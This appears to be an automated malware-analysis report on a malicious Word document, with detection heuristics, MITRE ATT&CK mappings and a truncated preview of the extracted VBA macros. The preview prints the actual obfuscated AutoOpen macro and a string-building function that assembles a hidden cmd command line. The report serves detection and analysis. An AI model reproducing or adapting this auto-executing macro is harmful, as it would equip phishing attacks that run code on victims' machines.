MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and likely attempts to execute obfuscated code. This suggests the document is designed to download and execute a secondary payload upon opening.
Heuristics 6
-
ClamAV: Doc.Trojan.Agent-6922916-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6922916-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67959 bytes |
SHA-256: 88ba5e3221ef0a032eed3a218a3af806a55afc50092f31b234d8e7c7840f9333 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kIHBiwwJLtrfRp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim timCzM(1)
timCzM(0) = MidB(cTBmzJ + EYkAWzmhdmYKHlUlMhJ + iMCwa, 229, 103) + MidB(kBsHO + vEmVZbNUNkfYKQvRKvqHEY + ZFsjmB, 780, 325)
Dim dqSoa(2)
dqSoa(0) = Right(mPuvDJTW + dQNYbqlZcEOuTaLzn + jUzji, 484) + Mid(zfdjvLkh + bCANmVJukjIVbhsa + RJmdY, 719, 220)
dqSoa(1) = MidB(isJrMiBV + OVfsDqQNUdrzJtNk + JSEBqzh, 5, 837) + MidB(KBilm + mSUwVLrzsClnkUCaqNr + VuRjFf, 268, 447)
Dim PwwFr(1)
PwwFr(0) = MidB(mBVHF + dGQVqmiVnwUbjIS + JjEuNuU, 377, 367) + MidB(wkRIw + RZOjcGMaiKpwiuzB + voSPv, 634, 47) + Mid(MdOEAjQ + wnBUlBNRzBzwvVl + hbERpV, 639, 59) + Right(SSQtFiGb + OiPEtBfQJfvVUiki + wEdfiGQ, 844)
Dim BiHwh(1)
BiHwh(0) = Mid(bavwU + izIBFziwLnPqhjtmZzuK + cudwXR, 98, 7) + MidB(psnLf + awLSWdwLFhjrzncDFwkt + pfIkwh, 135, 704)
Dim NzvFO(2)
NzvFO(0) = Left(LLXTJ + vzjcjqCcDhMPXavw + zsWpFz, 485) + MidB(ujNGp + iBpcLWrYfpvowYczGMn + RURIA, 751, 277) + MidB(YwuGoO + zbaIdOWTNdrqmjLqFjY + SdPAdG, 217, 279) + MidB(OLDAn + ljZkfmEXZdXVBJqAiO + CPUjXf, 365, 621)
NzvFO(1) = Left(CzrAfm + vFjhrBoKuKnvosTKsPZEt + SUiAd, 70) + Right(TnhUX + hVYVjVOEdKbINWbkiUHJQ + tVFlCzrz, 644) + Left(XWlEPJW + rpwlvtnZaMIPvcmbMkKfTV + ziEzm, 945) + MidB(DYTqIKGX + XIaILQWvrjJdQnGVdaKkz + fwSCdm, 474, 545)
Dim jkOawd(2)
jkOawd(0) = Right(OXmjZMr + uAPGKvRzICiDGzqFBzIYTu + IVnHt, 603) + Right(uTrYozoz + vLQmRalOimbwlJQLAID + EuHSR, 85) + Left(DFzVt + MmIRLSXfvCnUFsCE + TDTJZi, 470) + MidB(HsnMz + lzDlXbWOlVjzHThsioHmdu + nKzLnG, 120, 117)
jkOawd(1) = MidB(wzsjF + JprFoDAifLiKaJjERZhct + nriACj, 282, 973) + MidB(pMwHz + avbvaEIzBbObMwPJvGdbP + mBwkw, 346, 850)
Dim EGksG(2)
EGksG(0) = Mid(IzzURmS + ktZjwVWDVVTwcQDMUZK + lCObGL, 833, 748) + Right(mZTFVijh + OSMMWsAGBMaTIuvwsdi + BCJKh, 566)
EGksG(1) = MidB(VpBSpCFO + jLiLGKZbolfMLLT + AdQVEdHc, 127, 89) + MidB(iUCuSpw + IBwGaiWGrlfUIDvcDiSX + MmdSs, 419, 451)
Dim sbTPiv(2)
sbTPiv(0) = MidB(cNEDOM + GhUuRpiwNvsomuiPbcz + SNqKtzw, 491, 586) + Mid(nDpYDwU + ArhqrrkzWVJcDwUFEOW + zhKFFM, 599, 157)
sbTPiv(1) = MidB(jafAS + OcHzdjPNEcPHCiqJjDi + NXsHBYzB, 59, 252) + MidB(GWWwuskH + dJCzSKIVkqPkFqILaMuCk + TLmLudoU, 892, 685) + Left(FnshZ + rmRImnAcjiGSrzjcpNb + GDHrT, 645) + MidB(mhfDBC + GdMoMcncwvwwapGCjYwh + MUluZ, 799, 909)
Dim FJjjh(1)
FJjjh(0) = Left(WzShB + ZAjHzArdEudjRMcEvpXuvL + omukCzvo, 977) + MidB(Cjfcn + EGuKzdEzGBFlvXKbTrjkdNM + UQMkPGH, 377, 912) + MidB(QfFVpmt + iYclLzYVRzicLtRqio + ZELnlK, 898, 810) + Left(jvvoa + JjzijbBdKvVCXJDjzXLO + cdFijXT, 857)
fODaImlw (KeyString(vSLzsJEz + GlbqPZjM + 7 + 18 + 42 + utDcbu + TiiJJnY) + FhjJsiSP + pqFiLBJD + KeyString(jVwwXf + wcoSuj + 8 + 21 + 48 + tMCKlMR + qNzTIz) + iWbchjz + KBbbwAh + pkVTcz + vSIwD + zClOiPh + GjaFAOVC + ZSMmZREi + ssrIXrp)
Dim iaivW(1)
iaivW(0) = MidB(ivwOdVKn + MbqLivNdmBjXYRnAdH + qkFNjhz, 12, 211) + MidB(iLpswiUi + puYazFEXAIfzAadfjmqzcu + YrWIYok, 23, 806)
Dim jcscYl(1)
jcscYl(0) = Left(OpRSzoDM + wwfwXfjQjqNzkwtzJSMpvosH + UVcdCt, 701) + Right(FNwHtDI + jVDoAZzfHkIiYHrOkwrMm + aMLSlnoC, 508) + Right(jUCfXJ + baooPWtQtpJRYDURVzTbw + ruLFYi, 671) + Mid(WlYvwwtY + tEHQDuDHaIzqjtiKUGaCkh + YVZDv, 358, 247)
Dim zTLjVS(1)
zTLjVS(0) = MidB(NEJWbKz + CXVoYdbMtKoMEZFiNi + SiricO, 328, 662) + Mid(OpSPlYa + IYwwAhPCEVRaLKhPAM + TLwPK, 822, 760)
End Sub
Attribute VB_Name = "jdHKVrbof"
Function iWbchjz()
McpqXcN = "d / \ \\/\/ //" + " \ \ /V:/C" + """" + "set `}'" + "=a207 02a7 270a " + "a720 720a 72a0 0a7" + "2 7a02 a207 a072 " + "027a 027a "
SHzoF = "270a 2a07 02a7 027" + "a 0a72 a270}20a7}" + "270a{270ah270a" + "ca207t702aaa" + "720c270a}0a27;02a" + "7ka270aa702ea0"
zsrNij = "27r07a2b720a;70" + "2aCa270q20a7p7a2" + "0$a072 207ama02" + "7e0a72t72a0I"
iWbchjz = McpqXcN + SHzoF + zsrNij
Dim KOzsq(2)
KOzsq(0) = Mid(zucDNrTn + jtXfXqTfSkiiQWVYA + tLabrJ, 223, 38
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.